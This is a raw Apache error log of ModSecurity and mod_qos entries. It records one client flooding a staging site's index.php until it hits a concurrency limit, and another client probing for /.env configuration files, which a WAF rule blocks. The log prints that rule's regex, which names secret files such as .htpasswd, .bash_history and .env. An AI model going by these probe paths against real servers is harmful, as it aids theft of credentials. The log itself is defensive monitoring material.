[Tue May 26 19:54:00.286361 2026] [security2:error] [pid 93867:tid 94198] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsVgAAAXI"]
[Tue May 26 19:54:00.289011 2026] [security2:error] [pid 93867:tid 94194] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsTgAAAXA"]
[Tue May 26 19:54:00.294090 2026] [security2:error] [pid 93867:tid 94220] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsUwAAAXw"]
[Tue May 26 19:54:00.304708 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMeAAAACY"]
[Tue May 26 19:54:00.306443 2026] [security2:error] [pid 93867:tid 94181] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsUAAAAWo"]
[Tue May 26 19:54:00.311051 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMcQAAAEM"]
[Tue May 26 19:54:00.314213 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_kqK9k_ZUB2Vp25FbAAAAb0"]
[Tue May 26 19:54:00.315353 2026] [security2:error] [pid 93576:tid 93806] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMcwAAAF4"]
[Tue May 26 19:54:00.319525 2026] [security2:error] [pid 86490:tid 86621] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_lZMwN0DpLVWo6KyRAAAAIY"]
[Tue May 26 19:54:00.320239 2026] [security2:error] [pid 93867:tid 94104] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsWQAAAUc"]
[Tue May 26 19:54:00.327938 2026] [security2:error] [pid 86490:tid 86661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_lZMwN0DpLVWo6KyRgAAAK4"]
[Tue May 26 19:54:00.328503 2026] [security2:error] [pid 86490:tid 86623] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_lZMwN0DpLVWo6KyXgAAAIg"]
[Tue May 26 19:54:00.331728 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_lZMwN0DpLVWo6KyXwAAAKw"]
[Tue May 26 19:54:00.337980 2026] [security2:error] [pid 93867:tid 94158] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsWAAAAWA"]
[Tue May 26 19:54:00.339048 2026] [security2:error] [pid 93867:tid 94017] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsZgAAAQ0"]
[Tue May 26 19:54:00.341449 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_kqK9k_ZUB2Vp25FdwAAAd8"]
[Tue May 26 19:54:00.342849 2026] [security2:error] [pid 93576:tid 93819] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMfgAAAGs"]
[Tue May 26 19:54:00.352916 2026] [security2:error] [pid 93868:tid 94283] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_kqK9k_ZUB2Vp25FdAAAAag"]
[Tue May 26 19:54:00.353145 2026] [security2:error] [pid 93867:tid 94032] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsVQAAARw"]
[Tue May 26 19:54:00.377373 2026] [security2:error] [pid 93576:tid 93766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMfwAAADY"]
[Tue May 26 19:54:00.393681 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FhwAAAeA"]
[Tue May 26 19:54:00.396224 2026] [security2:error] [pid 93867:tid 94222] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_5CDfrjqoHpuuBKsfAAAAX0"]
[Tue May 26 19:54:00.434251 2026] [security2:error] [pid 93867:tid 94156] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_5CDfrjqoHpuuBKsfgAAAV8"]
[Tue May 26 19:54:00.436320 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMigAAAGk"]
[Tue May 26 19:54:00.437535 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMiQAAAGo"]
[Tue May 26 19:54:00.445463 2026] [security2:error] [pid 93867:tid 94093] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsYgAAAUI"]
[Tue May 26 19:54:00.448338 2026] [security2:error] [pid 93868:tid 94377] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FlAAAAgY"]
[Tue May 26 19:54:00.449860 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMkgAAABY"]
[Tue May 26 19:54:00.450020 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMlAAAAEk"]
[Tue May 26 19:54:00.455076 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FiwAAAZQ"]
[Tue May 26 19:54:00.546645 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAGDRMqfxdEDkoszMvQAAABA
[Tue May 26 19:54:00.548186 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky9QAAAIw
[Tue May 26 19:54:00.586163 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAGDRMqfxdEDkoszMvgAAAHQ
[Tue May 26 19:54:00.588513 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky9gAAANc
[Tue May 26 19:54:00.593571 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky9wAAALU
[Tue May 26 19:54:00.599203 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky-AAAAOE
[Tue May 26 19:54:00.600424 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky-QAAAKM
[Tue May 26 19:54:00.601280 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky-gAAAL4
[Tue May 26 19:54:00.607780 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky-wAAANY
[Tue May 26 19:54:00.607859 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky_AAAAKg
[Tue May 26 19:54:00.696878 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAGDRMqfxdEDkoszMvwAAAG0
[Tue May 26 19:54:00.702636 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6Ky_gAAAPk
[Tue May 26 19:54:00.736901 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAGDRMqfxdEDkoszMwAAAAD8
[Tue May 26 19:54:00.741115 2026] [qos:error] [pid 86490:tid 86621] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzAQAAAIY
[Tue May 26 19:54:00.788963 2026] [security2:error] [pid 93868:tid 94326] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web/config"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web/config/.env"] [unique_id "ahWtAEqK9k_ZUB2Vp25FtgAAAdM"]
[Tue May 26 19:54:00.855249 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzAgAAAPg
[Tue May 26 19:54:00.855351 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzBQAAAK4
[Tue May 26 19:54:00.855380 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzAwAAAJI
[Tue May 26 19:54:00.855800 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzBAAAAIg
[Tue May 26 19:54:00.856974 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAGDRMqfxdEDkoszMwQAAAF0
[Tue May 26 19:54:00.859095 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzBwAAAKE
[Tue May 26 19:54:00.859103 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzBgAAAMQ
[Tue May 26 19:54:00.862422 2026] [qos:error] [pid 86490:tid 86698] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzCAAAANM
[Tue May 26 19:54:00.886383 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAGDRMqfxdEDkoszMxQAAAAc
[Tue May 26 19:54:00.893169 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAFZMwN0DpLVWo6KzCQAAAKw
[Tue May 26 19:54:01.003295 2026] [qos:error] [pid 86490:tid 86726] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzEAAAAO8
[Tue May 26 19:54:01.003704 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzDwAAAOs
[Tue May 26 19:54:01.004862 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzEQAAAJc
[Tue May 26 19:54:01.006488 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszMxwAAAEo
[Tue May 26 19:54:01.012721 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzEgAAAM8
[Tue May 26 19:54:01.014477 2026] [qos:error] [pid 86490:tid 86631] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzFAAAAJA
[Tue May 26 19:54:01.017150 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzFQAAAIs
[Tue May 26 19:54:01.017903 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzFgAAAIs
[Tue May 26 19:54:01.034499 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszMyAAAAE0
[Tue May 26 19:54:01.044937 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzGQAAAPE
[Tue May 26 19:54:01.129426 2026] [security2:error] [pid 93868:tid 94287] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/modules/.env"] [unique_id "ahWtAUqK9k_ZUB2Vp25FvAAAAaw"]
[Tue May 26 19:54:01.152334 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzGwAAAP8
[Tue May 26 19:54:01.153581 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzHAAAANs
[Tue May 26 19:54:01.154758 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzHQAAANs
[Tue May 26 19:54:01.158373 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszMywAAAG8
[Tue May 26 19:54:01.167530 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzHgAAALM
[Tue May 26 19:54:01.167610 2026] [qos:error] [pid 86490:tid 86627] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzHwAAAIw
[Tue May 26 19:54:01.168254 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzIAAAALM
[Tue May 26 19:54:01.172931 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzIQAAALU
[Tue May 26 19:54:01.183683 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAWDRMqfxdEDkoszMzAAAAHw
[Tue May 26 19:54:01.197337 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtAVZMwN0DpLVWo6KzJQAAAL4
[Tue May 26 19:54:01.273732 2026] [security2:error] [pid 93867:tid 94042] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsaAAAASY"]
[Tue May 26 19:54:01.280237 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_1ZMwN0DpLVWo6KymwAAAMY"]
[Tue May 26 19:54:01.284575 2026] [security2:error] [pid 93868:tid 94258] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FhgAAAY8"]
[Tue May 26 19:54:01.289829 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FjAAAAfQ"]
[Tue May 26 19:54:01.294118 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FlwAAAdw"]
[Tue May 26 19:54:01.304831 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMmAAAAHY"]
[Tue May 26 19:54:01.308555 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_0qK9k_ZUB2Vp25FlQAAAZk"]
[Tue May 26 19:54:01.311239 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMkAAAACE"]
[Tue May 26 19:54:01.315646 2026] [security2:error] [pid 93576:tid 93756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_2DRMqfxdEDkoszMkwAAACw"]
[Tue May 26 19:54:01.334481 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_1ZMwN0DpLVWo6KynQAAANI"]
